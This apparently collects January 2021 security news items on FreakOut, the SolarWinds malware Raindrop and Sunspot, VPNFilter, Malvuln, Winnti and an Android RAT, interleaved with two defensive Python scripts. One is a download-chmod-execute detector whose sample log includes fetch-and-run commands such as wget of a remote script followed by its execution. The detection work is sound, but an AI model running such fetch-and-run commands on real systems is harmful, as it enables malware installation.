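2021-01-10T09:14:05Z nas01 root wget https://gxbrowser.net/out.py -O /tmp/out.py
2021-01-10T09:14:06Z nas01 root chmod 777 /tmp/out.py
2021-01-10T09:14:07Z nas01 root python2 /tmp/out.py
2021-01-10T10:02:11Z web02 deploy curl -sSL https://example.org/setup.sh -o setup.sh
2021-01-10T10:02:13Z web02 deploy chmod +x setup.sh
2021-01-10T10:02:15Z web02 deploy ./setup.sh
2021-01-10T11:30:00Z web02 deploy python2 legacy_report.py
"""


def parse_line(line):
    """Split one constructed audit line into (timestamp, host, user, argv)."""
    ts, host, user, cmd = line.split(" ", 3)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, shlex.split(cmd)


def downloaded_path(argv):
    """Return (url, local path) for a wget/curl command, or None if no URL."""
    url, out = None, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in ("-O", "-o") and i + 1 < len(argv):
            out = argv[i + 1]
            i += 1
        elif arg.startswith(("http://", "https://")):
            url = arg
        i += 1
    if url is None:
        return None
    # Without -O/-o both tools save under the URL's basename in the cwd.
    return url, out or posixpath.basename(urlparse(url).path)


def normalise(path):
    """Treat './out.py' and 'out.py' as the same file."""
    return path[2:] if path.startswith("./") else path


def detect_chain(log_text):
    """Return one alert per download -> chmod -> execute chain found in the log."""
    alerts = []
    downloads = {}  # (host, path) -> {"ts", "url", "chmod"}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, user, argv = parse_line(line)
        if not argv:
            continue
        prog = posixpath.basename(argv[0])
        if prog in DOWNLOADERS:
            found = downloaded_path(argv)
            if found:
                url, path = found
                downloads[(host, normalise(path))] = {"ts": ts, "url": url, "chmod": False}
            continue
        if prog == "chmod":
            for arg in argv[1:]:
                rec = downloads.get((host, normalise(arg)))
                if rec:
                    rec["chmod"] = True
            continue
        # Execution: an interpreter given a downloaded script, or the file run directly.
        candidates = argv[1:] if prog in INTERPRETERS else [argv[0]]
        for arg in candidates:
            rec = downloads.get((host, normalise(arg)))
            if not rec or not rec["chmod"] or ts - rec["ts"] > WINDOW:
                continue
            drop_host = urlparse(rec["url"]).hostname
            # Python 2 is EOL, so a freshly fetched script run under it is itself a strong signal.
            high = drop_host in KNOWN_DROP_HOSTS or prog.startswith("python2")
            alerts.append({"host": host, "user": user, "script": normalise(arg),
                           "source": rec["url"], "interpreter": prog,
                           "severity": "high" if high else "medium",
                           "time": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_LOG):
        print(alert)
```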

[Figure] The top industries targeted by the FreakOut malware. Credit: Check Point

This script has varying capabilities, including a port scanning feature, the ability to collect system fingerprints (such as device addresses and memory information), the ability to create and send packets, and brute-force capabilities that use hard-coded credentials to infect other network devices.

According to a deep dive of the attackers’ main command and control (C2) server, an estimated 185 devices have been hacked thus far.

Researchers said that between Jan. 8 and Jan. 13 they observed 380 (blocked) attack attempts against customers. Most of these attempts were in North America and Western Europe, with the most targeted industries being finance, government and healthcare organizations.

To protect against FreakOut, researchers recommend Linux device users that utilize TerraMaster TOS, Zend Framework or Liferay Portal make sure they have deployed all patches.

“We strongly recommend users check and patch their servers and Linux devices in order to prevent the exploitation of such vulnerabilities by FreakOut,” they said.


Raindrop, a fourth malware employed in SolarWinds attacks
20.1.2021  Virus  Securityaffairs

The threat actors behind the SolarWinds attack used malware dubbed Raindrop for lateral movement and deploying additional payloads.
Security experts from Symantec revealed that threat actors behind the SolarWinds supply chain attack leveraged a malware named Raindrop for lateral movement and deploying additional payloads.

Raindrop is the fourth malware that was discovered investigating the SolarWinds attack after the SUNSPOT backdoor, the Sunburst/Solorigate backdoor and the Teardrop tool.
Raindrop (Backdoor.Raindrop) is a loader that was used by attackers to deliver a Cobalt Strike payload. Raindrop is similar to the Teardrop tool, but while the latter was delivered by the initial Sunburst backdoor, the former was used for spreading across the victim’s network.

“Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst.” reads a blog post published by Symantec.

Symantec has investigated four Raindrop infections to date; the malware was employed in the last phases of the attacks against a very few selected targets.

Both Raindrop and Teardrop are used to deploy Cobalt Strike Beacon, but they use different packers and different Cobalt Strike configurations.
“To date, Symantec has seen four samples of Raindrop. In three cases, Cobalt Strike was configured to use HTTPS as a communication protocol. In the fourth it was configured to use SMB Named Pipe as a communication protocol.” continues the post.

“All three Raindrop samples using HTTPS communication follow very similar configuration patterns as previously seen in one Teardrop sample.”

In the following table there are key differences between the two tools (Teardrop vs. Raindrop):

Payload format
  Teardrop: Custom, reusing features from PE format. It may be possible to reuse the packer with a range of different payloads supplied as PE DLLs with automatic conversion.
  Raindrop: Shellcode only.

Payload embedding
  Teardrop: Binary blob in data section.
  Raindrop: Steganography, stored at pre-determined locations within the machine code.

Payload encryption
  Teardrop: visualDecrypt combined with XOR using long key.
  Raindrop: AES layer before decompression; separate XOR layer using one byte key after decompression.

Payload compression
  Teardrop: None.
  Raindrop: LZMA.

Obfuscation
  Teardrop: Reading JPEG file. Inserted blocks of junk code, some could be generated using a polymorphic engine.
  Raindrop: Non-functional code to delay execution.

Export names
  Teardrop: Export names vary, in some cases names overlapping with Tcl/Tk projects.
  Raindrop: Export names overlap with Tcl/Tk projects.

Stolen code
  Teardrop: Byte-copy of machine code from pre-existing third-party components. The original code is distributed in compiled format only.
  Raindrop: Recompiled third-party source code.

The report published by Symantec includes IoCs and Yara Rules.


Hundreds of Networks Still Host Devices Infected With VPNFilter Malware
20.1.2021  Virus  Securityweek

The VPNFilter malware is still present in hundreds of networks and malicious actors could take control of the infected devices, according to researchers at cybersecurity firm Trend Micro.

Identified in 2018 and mainly focusing on Ukraine, VPNFilter rose to fame quickly due to the targeting of a large number of routers and network-attached storage (NAS) devices from ASUS, D-Link, Huawei, Linksys, MikroTik, Netgear, QNAP, TP-Link, Ubiquiti, UPVEL, and ZTE.

Believed to be operated by Russian threat actor Sofacy, with possible involvement from Sandworm, VPNFilter emerged as a major threat right from the start: 50 impacted device models, the potential to compromise critical infrastructure, and approximately 500,000 bots observed across 54 countries.

Deep analysis of the malware revealed extensive capabilities: various modules allow it to map networks, exploit endpoints connected to infected devices, exfiltrate data, encrypt communications with the command and control (C&C) server, find additional victims, and create a network of proxies for future abuse.

VPNFilter first attempts to obtain the address of its C&C server from an image hosted on Photobucket. If that fails, it attempts to obtain the C&C address from toknowall[.]com, and if that also fails, it monitors incoming packets for a specially crafted TCP packet containing the IP of the C&C server.

In an effort to determine whether the botnet continues to pose a real threat after more than two years since the initial attacks, Trend Micro’s security researchers reached out to the Shadowserver Foundation, which, in collaboration with Cisco Talos, the FBI, and the US Department of Justice, has sinkholed toknowall[.]com.

Data gathered from the sinkhole shows that 5,447 unique devices are still connecting to the domain, meaning that they are still infected. The number of infections, however, is believed to be higher, as the domain might be blocked at DNS level.

“It is important to remember that because these are routers and other similar types of devices, this number also represents thousands of infected networks, not simply individual machines. This means that the reach and visibility for attackers with a botnet like this can be substantial,” Trend Micro says.

The security researchers also decided to check if it would be possible to feed a new IP address to infected devices, to see how many of them were still waiting for a second-stage payload. They crafted a packet, sent it, and noticed that 1,801 networks did respond to it, while 363 of the networks reached back to the sinkhole on port TCP 443.

“Although only 363 networks connected back to our sinkhole, we cannot assume that the 1,801 networks that gave us an initial positive response are clean. They might still be infected by VPNFilter, but the connection to our sinkhole could have been blocked if they are behind a firewall,” Trend Micro says.

The networks that reached out, the researchers say, can easily be taken over by any threat actor with knowledge of how the VPNFilter malware works, and there’s nothing to prevent that, from a technical perspective. The original actor too can regain control of these devices at any point in time, the researchers say.

The problem, Trend Micro explains, could be addressed through firmware updates, especially since the malware has been around for so long, and solutions to remedy infections do exist. Simply restarting the infected devices, however, won’t solve the issue, as initially believed.

VPNFilter, the researchers believe, will continue to lurk around until the infected devices are replaced, as many of them lack an automated firmware update system, meaning that users have to manually update them, provided that they indeed have access to the routers to perform the update and that the vendor has issued a patch.


SolarWinds Hackers Used 'Raindrop' Malware for Lateral Movement
20.1.2021  Virus  Securityweek

The threat group behind the supply chain attack that targeted Texas-based IT management company SolarWinds leveraged a piece of malware named Raindrop for lateral movement and deploying additional payloads, Broadcom-owned cybersecurity firm Symantec reported on Tuesday.

The SolarWinds attack involved the delivery of trojanized updates for Orion, an IT monitoring product, to as many as 18,000 of the company’s customers. These malicious updates delivered a piece of malware named Sunburst, which the attackers inserted into the Orion product using another piece of malware, named Sunspot.

In the case of a few hundred victims that presented an interest to them, including government and high-profile private organizations, the hackers also delivered a piece of malware named by researchers Teardrop, which in turn attempted to deploy a custom version of Cobalt Strike's Beacon payload.

According to Symantec, the attackers also used another tool — very similar to Teardrop — for lateral movement and to deliver the same Cobalt Strike payload. Raindrop, described by the company as a loader and tracked as Backdoor.Raindrop, was spotted on compromised networks but, unlike Teardrop, it doesn’t appear to have been delivered directly by Sunburst. 

“Raindrop appears to have been used for spreading across the victim’s network. Symantec has seen no evidence to date of Raindrop being delivered directly by Sunburst. Instead, it appears elsewhere on networks where at least one computer has already been compromised by Sunburst,” Symantec said in a blog post.

On devices infected with Raindrop, the company also noticed tools that can be used to obtain passwords and keys, and saw the execution of PowerShell commands with the goal of executing instances of Raindrop on other devices on the network.

While Raindrop is similar to Teardrop, Symantec says they use different packers and there are differences in Cobalt Strike configurations. In one instance, Cobalt Strike was configured to use SMB Named Pipe as a communications protocol rather than HTTPS, which led experts to believe that the compromised device did not have direct access to the internet, forcing the attackers to route C&C communications through another computer on the network.

The U.S. government and others said Russia was likely behind the attack on SolarWinds. Kaspersky recently found a link between the Sunburst malware and Kazuar, a piece of malware previously connected to a Russian cyberspy group known as Turla.


Researchers Discover Raindrop — 4th Malware Linked to the SolarWinds Attack
20.1.2021  Virus  Thehackernews
Cybersecurity researchers have unearthed a fourth new malware strain—designed to spread the malware onto other computers in victims' networks—which was deployed as part of the SolarWinds supply chain attack disclosed late last year.

Dubbed "Raindrop" by Broadcom-owned Symantec, the malware joins the likes of other malicious implants such as Sunspot, Sunburst (or Solorigate), and Teardrop that were stealthily delivered to enterprise networks.

The latest finding comes amid a continued probe into the breach, suspected to be of Russian origin, that has claimed a number of U.S. government agencies and private sector companies.

"The discovery of Raindrop is a significant step in our investigation of the SolarWinds attacks as it provides further insights into post-compromise activity at organizations of interest to the attackers," Symantec researchers said.

The cybersecurity firm said it discovered only four samples of Raindrop to date that were used to deliver the Cobalt Strike Beacon — an in-memory backdoor capable of command execution, keylogging, file transfer, privilege escalation, port scanning, and lateral movement.

Symantec, last month, had uncovered more than 2,000 systems belonging to 100 customers that received the trojanized SolarWinds Orion updates, with select targets infected with a second-stage payload called Teardrop that's also used to install the Cobalt Strike Beacon.

"The way Teardrop is built, it could have dropped anything; in this case, it dropped Beacon, a payload included with Cobalt Strike," Check Point researchers said, noting that it was possibly done to "make attribution harder."

"While Teardrop was used on computers that had been infected by the original Sunburst Trojan, Raindrop appeared elsewhere on the network, being used by the attackers to move laterally and deploy payloads on other computers."

It's worth noting that the attackers used the Sunspot malware exclusively against SolarWinds in September 2019 to compromise its build environment and inject the Sunburst Trojan into its Orion network monitoring platform. The tainted software was then delivered to 18,000 of the company's customers.

Microsoft's analysis of the Solorigate modus operandi last month found that the operators carefully chose their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop based on intel amassed during an initial reconnaissance of the target environment for high-value accounts and assets.

Now Raindrop ("bproxy.dll") joins the mix. While both Teardrop and Raindrop act as a dropper for the Cobalt Strike Beacon, they also differ in a number of ways.

For a start, Teardrop is delivered directly by the initial Sunburst backdoor, whereas Raindrop seems to have been deployed with the goal of spreading across the victims' network. What's more, the malware shows up on networks where at least one computer has already been compromised by Sunburst, with no indication that Sunburst triggered its installation.

The two malware strains also use different packers and Cobalt Strike configurations.

Symantec did not identify the organizations impacted by Raindrop but said the samples were found in a victim system that was running computer access and management software and on a machine that was found to execute PowerShell commands to infect additional computers in the organization with the same malware.


Expert launched Malvuln, a project to report flaws in malware
16.1.2021 
Virus  Securityaffairs

The researcher John Page launched malvuln.com, the first website exclusively dedicated to the research of security flaws in malware codes.
The security expert John Page (aka hyp3rlinx) launched malvuln.com, the first platform exclusively dedicated to the research of security flaws in malware codes.

The news was first announced by SecurityWeek, the researcher explained that Malvuln is the first website dedicated to research and analysis of vulnerabilities in malware samples.

“malvuln.com is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.” wrote the expert. “There are many websites already offering information about Malware like Hashes, IOC, Reversing etc. However, none dedicated to research and analysis of vulnerabilities within Malware samples… until now. Long Live MALVULN.”

Sharing the knowledge of vulnerabilities affecting malware could allow incident response teams to neutralize the threat in case of infection, but it could also help vxers to address those flaws and improve their malware. For this reason, it is likely that Page will regulate the vulnerability disclosure process in the future.

This is a great initiative and we have to support it; anyone can get in contact with the expert via Twitter (@malvuln) or email (malvuln13[at]gmail.com).

Currently, Page is the unique contributor of the Malvuln service, but he could start accepting third-party contributions in the future.

Clearly, the initiative was born for educational and research purposes only.

At the time of writing the site already includes 26 entries related to remotely exploitable buffer overflow flaws and privilege escalation issues. Most of the buffer overflow vulnerabilities could be exploited for remote code execution.

For each flaw reported through the website, the record includes information such as the name of the malware, the MD5 hash, the type of vulnerability, a description of the vulnerability, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.


Malvuln Project Catalogues Vulnerabilities Found in Malware
16.1.2021 
Virus  Securityweek


A researcher has launched Malvuln, a project that catalogues vulnerabilities discovered in malware and provides information on how those vulnerabilities can be exploited.

Malvuln is the creation of security researcher John Page (aka hyp3rlinx), who told SecurityWeek that he came up with the idea when he got bored during a COVID-19 lockdown.

The Malvuln website currently has 26 entries describing remotely exploitable buffer overflow vulnerabilities and privilege escalation flaws related to insecure permissions. The list of targeted malware includes backdoors and trojans, as well as one email worm (Zhelatin). A vast majority of the buffer overflow bugs can be exploited for remote code execution, the expert said.

Each entry contains the name of the malware, its associated hash, the type of vulnerability, a brief description of the flaw, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.

The researcher said he found all the vulnerabilities currently in the Malvuln database himself, but he suggested on Twitter that at some point — depending on where the project goes — he could also start accepting third-party contributions.

Page told SecurityWeek that the information hosted on Malvuln could turn out to be useful to incident response teams to “eradicate a malware without touching the machine if it's a remote exploit.” He added that it “may eventually pit a malware vs malware situation.”

He hopes that the project will be useful to the infosec community, but others caution that it could also help bad actors. Greg Leah, director of threat intelligence at attribution intelligence and response firm HYAS, says the information could also be useful to malware developers and it could hamper ongoing research into malicious activity.



Researchers Disclose Undocumented Chinese Malware Used in Recent Attacks
16.1.2021 
Virus  Thehackernews
Cybersecurity researchers have disclosed a series of attacks by a threat actor of Chinese origin that has targeted organizations in Russia and Hong Kong with malware — including a previously undocumented backdoor.

Attributing the campaign to Winnti (or APT41), Positive Technologies dated the first attack to May 12, 2020, when the APT used LNK shortcuts to extract and run the malware payload. A second attack detected on May 30 used a malicious RAR archive file consisting of shortcuts to two bait PDF documents claimed to be a curriculum vitae and an IELTS certificate.

The shortcuts themselves contain links to pages hosted on Zeplin, a legitimate collaboration tool for designers and developers, which are used to fetch the final-stage malware that, in turn, includes a shellcode loader ("svchast.exe") and a backdoor called Crosswalk ("3t54dE3r.tmp").

Crosswalk, first documented by FireEye in 2017, is a bare-bones modular backdoor capable of carrying out system reconnaissance and receiving additional modules from an attacker-controlled server as shellcode.

While this modus operandi shares similarities with that of the Korean threat group Higaisa — which was found exploiting LNK files attached to emails to launch attacks on unsuspecting victims in 2020 — the researchers said the use of Crosswalk suggests the involvement of Winnti.

This is also supported by the fact that the network infrastructure of the samples overlaps with previously known APT41 infrastructure, with some of the domains traced back to Winnti attacks on the online video game industry in 2013.

The new wave of attacks is no different. Notably, the targets include Battlestate Games, a Unity3D game developer from St. Petersburg.

Furthermore, the researchers found additional attack samples in the form of RAR files that contained Cobalt Strike Beacon as the payload, with the hackers in one case referencing the U.S. protests related to the death of George Floyd last year as a lure.

In another instance, compromised certificates belonging to a Taiwanese company called Zealot Digital were abused to strike organizations in Hong Kong with Crosswalk and Metasploit injectors, as well as ShadowPad, Paranoid PlugX, and a new .NET backdoor called FunnySwitch.

The backdoor, which appears to be still under development, is capable of collecting system information and running arbitrary JScript code. It also shares a number of common features with Crosswalk, leading the researchers to believe that they were written by the same developers.

Previously, Paranoid PlugX had been linked to attacks on companies in the video games industry in 2017. Thus, the deployment of the malware via Winnti's network infrastructure adds credence to the "relationship" between the two groups.

"Winnti continues to pursue game developers and publishers in Russia and elsewhere," the researchers concluded. "Small studios tend to neglect information security, making them a tempting target. Attacks on software developers are especially dangerous for the risk they pose to end users, as already happened in the well-known cases of CCleaner and ASUS."


Sunspot, the third malware involved in the SolarWinds supply chain attack
13.1.2021 
Virus  Securityaffairs

Cybersecurity firm CrowdStrike announced that it has discovered a third malware strain, named Sunspot, directly involved in the SolarWinds supply chain attack.
According to a new report published by CrowdStrike, a third malware, dubbed SUNSPOT, was involved in the recently disclosed SolarWinds supply chain attack.

SUNSPOT was discovered after the Sunburst/Solorigate backdoor and Teardrop malware, but chronologically it may have been the first code to be involved in the attack.

At the time of the report, CrowdStrike does not attribute any of the three implants to any known threat actors.

CrowdStrike tracks the threat actor behind the SolarWinds attack as StellarParticle, while FireEye and Microsoft identified it as UNC2452, and Volexity as DarkHalo.

SUNSPOT is used by the attackers to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.

“SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code.” states the report published by the security firm.

“Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary’s presence.”

Once SUNSPOT detected a build command, it inserted the malicious code into the Orion app, producing a tainted version of the legitimate software.

The threat actors spent significant effort developing SUNSPOT to ensure the stealthy injection of the malicious code.

“When SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the solution directory, with a malicious variant to inject SUNBURST while Orion is being built. While SUNSPOT supports replacing multiple files, the identified copy only replaces InventoryManager.cs.” continues the report.

The report published by CrowdStrike includes Indicators of Compromise (IoCs) and Yara rules to detect this new strain of malware.

SolarWinds also published an update on the attack, revealing that the malware was deployed to customers between March and June 2020, but that the threat actors executed a test run between September and November 2019.

“Our current timeline for this incident begins in September 2019, which is the earliest suspicious activity on our internal systems identified by our forensic teams in the course of their current investigations.” reads the update provided by SolarWinds. “The subsequent October 2019 version of the Orion Platform release appears to have contained modifications designed to test the perpetrators’ ability to insert code into our builds”


'Sunspot' Malware Used to Insert Backdoor Into SolarWinds Product in Supply Chain Attack
13.1.2021 
Virus  Securityweek

CrowdStrike, one of the cybersecurity companies called in by IT management firm SolarWinds to investigate the recently disclosed supply chain attack, on Monday shared details about a piece of malware used by the attackers to insert a backdoor into SolarWinds’ Orion product.

According to CrowdStrike, the threat group behind the attack on SolarWinds used a piece of malware named Sunspot to inject the previously analyzed Sunburst backdoor into the Orion product without being detected.

SolarWinds said the attackers created trojanized Orion updates containing the Sunburst backdoor and delivered them to as many as 18,000 customers. However, it appears that only a few hundred of those customers were of interest to the attackers and received secondary payloads, such as the post-exploitation tool named Teardrop.

An analysis conducted by CrowdStrike revealed that the hackers deployed Sunspot on SolarWinds systems. Sunspot is designed to check every second for the presence of processes associated with the compilation of the Orion product on the compromised system. If such a process is detected, Sunspot replaces a single source code file to include the Sunburst backdoor.

Specifically, Sunspot looks for the MsBuild.exe process, which is associated with Microsoft Visual Studio development tools. If the process is detected, it attempts to determine if it’s being used to build Orion software.

“When SUNSPOT finds the Orion solution file path in a running MsBuild.exe process, it replaces a source code file in the solution directory, with a malicious variant to inject SUNBURST while Orion is being built,” CrowdStrike explained. “While SUNSPOT supports replacing multiple files, the identified copy only replaces InventoryManager.cs.”

CrowdStrike said the attackers sanitized the Sunburst source code and took other steps to increase their chances of avoiding detection by SolarWinds.

“The malicious source code for SUNBURST, along with target file paths, are stored in AES128-CBC encrypted blobs and are protected using the same key and initialization vector,” the company explained. “As causing build errors would very likely prompt troubleshooting actions from the Orion developers and lead to the adversary’s discovery, the SUNSPOT developers included a hash verification check, likely to ensure the injected backdoored code is compatible with a known source file, and also avoid replacing the file with garbage data from a failed decryption.”
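Both SolarWinds items above describe the same build-time technique: a single source file (InventoryManager.cs) swapped while MsBuild.exe is compiling Orion. The build side can defend against that by pinning source files to a manifest produced from the reviewed commit and verifying the tree immediately before the build. The script below is an added example, not CrowdStrike's or SolarWinds' code; the manifest format and the file names other than InventoryManager.cs are assumptions.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List

SOURCE_GLOB = "*.cs"  # Orion is a .NET product; the text names InventoryManager.cs


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large sources need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Map each source file (path relative to root) to its SHA-256.

    In a real pipeline the manifest is produced from the reviewed commit and
    stored out of band (signed, next to the build definition), never on the
    build host itself; otherwise an intruder on the host can update both.
    """
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob(SOURCE_GLOB))
    }


def verify_tree(root: Path, manifest: Dict[str, str]) -> List[str]:
    """Compare the tree against the manifest just before MsBuild is invoked.

    Returns human-readable findings; an empty list means the tree is intact.
    MODIFIED covers the single-file swap the text describes, MISSING a removed
    file, UNEXPECTED a file the reviewed commit never contained.
    """
    findings: List[str] = []
    for rel, expected in manifest.items():
        path = root / rel
        if not path.is_file():
            findings.append(f"MISSING {rel}")
            continue
        actual = sha256_file(path)
        if actual != expected:
            findings.append(f"MODIFIED {rel} expected={expected[:12]} actual={actual[:12]}")
    for path in sorted(root.rglob(SOURCE_GLOB)):
        rel = path.relative_to(root).as_posix()
        if rel not in manifest:
            findings.append(f"UNEXPECTED {rel}")
    return findings


def demo(tamper: bool = True) -> List[str]:
    """Constructed scenario: snapshot a two-file solution, then (optionally)
    change the contents of InventoryManager.cs between snapshot and build,
    which is the window SUNSPOT used. Returns the verifier's findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        src = root / "Orion"
        src.mkdir()
        (src / "InventoryManager.cs").write_text("class InventoryManager {}\n")
        (src / "Program.cs").write_text("class Program {}\n")
        manifest = build_manifest(root)
        if tamper:
            # Stand-in for a file replaced on the build host after review.
            (src / "InventoryManager.cs").write_text("class InventoryManager { }\n")
        return verify_tree(root, manifest)


if __name__ == "__main__":
    for finding in demo() or ["OK: tree matches manifest"]:
        print(finding)
```

The check is independent of how the file was written, so it complements (rather than replaces) monitoring of file writes into the solution directory and of unexpected parents of MsBuild.exe.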

After the SolarWinds breach came to light, many have been wondering exactly who was behind the attack. The U.S. government said it was likely Russia and some reports claimed it may have been the Russia-linked threat group known as APT29 and Cozy Bear. However, CrowdStrike says it currently does not attribute any of the malware used in the SolarWinds attack to a known threat actor, and it has decided to track the campaign as an activity cluster named StellarParticle.

CrowdStrike has made available indicators of compromise (IoC) and information on the tactics, techniques and procedures (TTP) associated with the Sunspot activity.

Also on Monday, Kaspersky reported finding some links between the Sunburst malware, including similarities in code and development choices, and Kazuar, a .NET backdoor that has been around since at least 2015 and which has been attributed to the Russian cyberspy group Turla. However, Kaspersky says it’s unclear if Kazuar and Sunburst have been developed by the same group.


Experts Sound Alarm On New Android Malware Sold On Hacking Forums
13.1.2021 
Virus  Thehackernews
Cybersecurity researchers have exposed the operations of an Android malware vendor who teamed up with a second threat actor to market and sell a remote access Trojan (RAT) capable of device takeover and exfiltration of photos, locations, contacts, and messages from popular apps such as Facebook, Instagram, WhatsApp, Skype, Telegram, Kik, Line, and Google Messages.

The vendor, who goes by the name of "Triangulum" in a number of darknet forums, is alleged to be a 25-year-old man of Indian origin, with the individual opening up shop to sell the malware three years ago on June 10, 2017, according to an analysis published by Check Point Research today.

"The product was a mobile RAT, targeting Android devices and capable of exfiltration of sensitive data from a C&C server, destroying local data – even deleting the entire OS, at times," the researchers said.

An Active Underground Market for Mobile Malware
Piecing together Triangulum's trail of activities, the cybersecurity firm said the malware developer — aside from drumming up publicity for the RAT — also looked for potential investors and partners in September 2017 to show off the tool's features before offering the malware for sale.

Triangulum, subsequently, is believed to have gone off the grid for about a year-and-a-half, with no signs of activity on the darknet, only to resurface on April 6, 2019, with another product called "Rogue," this time in collaboration with another adversary named "HeXaGoN Dev," who specialized in the development of Android-based RATs.

Noting that Triangulum had previously purchased several malware products offered by HeXaGoN Dev, Check Point said Triangulum advertised his products on different darknet forums with well-designed infographics listing the full features of the RAT. Furthermore, HeXaGoN Dev posed as a potential buyer in a bid to attract more customers.

While the 2017 product was sold for a flat $60 as a lifetime subscription, the vendors pivoted to a more financially viable model in 2020, charging customers anywhere from $30 (1 month) to $190 (permanent access) for the Rogue malware.

Interestingly, Triangulum's attempts to expand to the Russian darknet market were met with failure following the actor's refusal to share demo videos on the forum post advertising the product.

From Cosmos to Dark Shades to Rogue
Rogue (v6.2) — which appears to be the latest iteration of a malware called Dark Shades (v6.0) that was initially sold by HeXaGoN Dev before being purchased by Triangulum in August 2019 — also comes with features taken from a second malware family called Hawkshaw, whose source code became public in 2017.

"Triangulum didn't develop this creation from scratch, he took what was available from both worlds, open-source and the darknet, and united these components," the researchers said.

Dark Shades, as it turns out, is a "superior successor" to Cosmos, a separate RAT sold by the HeXaGoN Dev actor, thus making the sale of Cosmos redundant.

Rogue is marketed as a RAT "made to execute commands with incredible features without a need of computer (sic)," with additional capabilities to control the infected clients remotely using a control panel or a smartphone.

Indeed, the RAT boasts of a wide range of features to gain control over the host device and exfiltrate any kind of data (such as photos, location, contacts, and messages), modify the files on the device, and even download additional malicious payloads, while ensuring that the user grants intrusive permissions to carry out its nefarious activities.

It's also engineered to thwart detection by hiding its icon from the user's device, circumventing Android security restrictions by exploiting accessibility features to log user actions, and registering its own notification service to snoop on every notification that pops up on the infected phone.

What's more, stealth is built into the tool. Rogue uses Google's Firebase infrastructure as a command-and-control (C2) server to disguise its malicious intentions, abusing the platform's cloud messaging feature to receive commands from the server, and Realtime Database and Cloud Firestore to upload amassed data and documents from the victim device.

Rogue Suffered a Leak in April 2020
Triangulum may be currently active and expanding his clientele, but in April 2020, the malware ended up getting leaked.

ESET researcher Lukas Stefanko, in a tweet on April 20 last year, said the backend source code of the Rogue Android botnet was published in an underground forum, noting "it has lot of security issues," and that "it is new naming for Dark Shades V6.0 (same developer)."

But despite the leakage, Check Point researchers note that the Triangulum team still receives messages on the actor's home Darknet forum from interested customers.

"Mobile malware vendors are becoming far more resourceful on the dark net. Our research gives us a glimpse into the craziness of the dark net: how malware evolves, and how difficult it is to now track, classify and protect against them in an effective way," Check Point's Head of Cyber Research, Yaniv Balmas, said.

"The underground market is still like the wild-west in a sense, which makes it very hard to understand what is a real threat and what isn't."


Malicious Software Infrastructure Easier to Get and Deploy Than Ever

9.1.2021  Virus  Threatpost
Researchers at Recorded Future report a rise in cracked Cobalt Strike and other open-source adversarial tools with easy-to-use interfaces.

Offensive security tools that are simple to use and deploy, which make it easier than ever for criminals with little technical know-how to get in on cybercrime, are seeing a significant rise, researchers say.

Recorded Future just released findings from its regular year-end observations of malicious infrastructure, identifying more than 10,000 unique command and control (C2) servers, across 80 malware families — nearly all linked to advanced persistent threat (APT) groups or “high-end financial actors.”

Recorded Future’s 2020 Adversary Infrastructure Report explained that researchers anticipate increased adoption of open-source tools because they’re easy to use and accessible to criminals without deep technical expertise.

“Over the next year, Recorded Future expects further adoption of open-source tools that have recently gained popularity, specifically Covenant, Octopus C2, Sliver and Mythic,” the report said. “Three of these tools have graphical user interfaces, making them easier to use for less experienced operators and all four have verbose documentation on their uses.”

Open Source and Cobalt Strike Dominate
Researchers go on to explain that since the Cobalt Strike source code leaked last November on GitHub, its use has increased, and that cracked or trial versions were largely being used by notable APTs including APT41, Mustang Panda, Ocean Lotus and FIN7. Cobalt Strike was also linked to the highest number of observed C2 servers last year, the report said.

Cobalt Strike is a penetration-testing tool, which is commercially available. It sends out beacons to detect network vulnerabilities. When used for its intended purpose, it simulates an attack. Threat actors have since figured out how to turn it against networks to exfiltrate data, deliver malware and create fake C2 profiles which look legit and avoid detection.

Cobalt Strike was used with 1,441 observed C2 servers in 2020, according to Recorded Future, followed by Metasploit with 1,122 and PupyRat with 454.

“The most commonly observed families were dominated by open-source or commercially available tooling,” the report said. “Detections of unaltered Cobalt Strike deployments (the pre-configured TLS certificate, Team Server administration port, or telltale HTTP headers) represented 13.5 percent of the total C2 servers identified. Metasploit and PupyRAT represented the other top open-source command-and-control servers identified by Recorded Future.”

Links to APTs
The report added that nearly every observed offensive security tool (OST), including Cobalt Strike and others, can be traced back to attacks from APT actors.

“Nearly all of the OSTs detected by Recorded Future have been linked to APT or high-end financial actors,” the report said. “The ease of access and use of these tools, mixed with the murkiness of potential attribution, makes them appealing for unauthorized intrusions and red teams alike.”

The APT threat landscape overall has gotten more complex over the past year, according to Kaspersky’s 2020 APT trends report, thanks to widespread innovation across APT groups with varying tactics, techniques and procedures (TTPs).

Once researchers were able to identify the C2 servers, they traced those back to 576 different hosting providers. Amazon hosted the most with 471, or about 3.8 percent. Fellow U.S.-based host Digital Ocean came in second on the list with 421. The report explained that’s not necessarily a red flag.

“The deployment of Cobalt Strike and Metasploit controllers on these providers is not indicative of malpractice or negligent hosting but is more likely due to authorized red teams using these tools on cloud infrastructure,” the report said.

Recorded Future explained the point of this ongoing malicious infrastructure audit is to help security teams identify actors as they’re setting up, rather than waiting for them to get up and running and able to strike. The report found teams have what amounts to about a 61-day lead time from when a C2 server is created to when it’s detectable. The report adds the average time these servers host malicious infrastructure is 54.8 days.

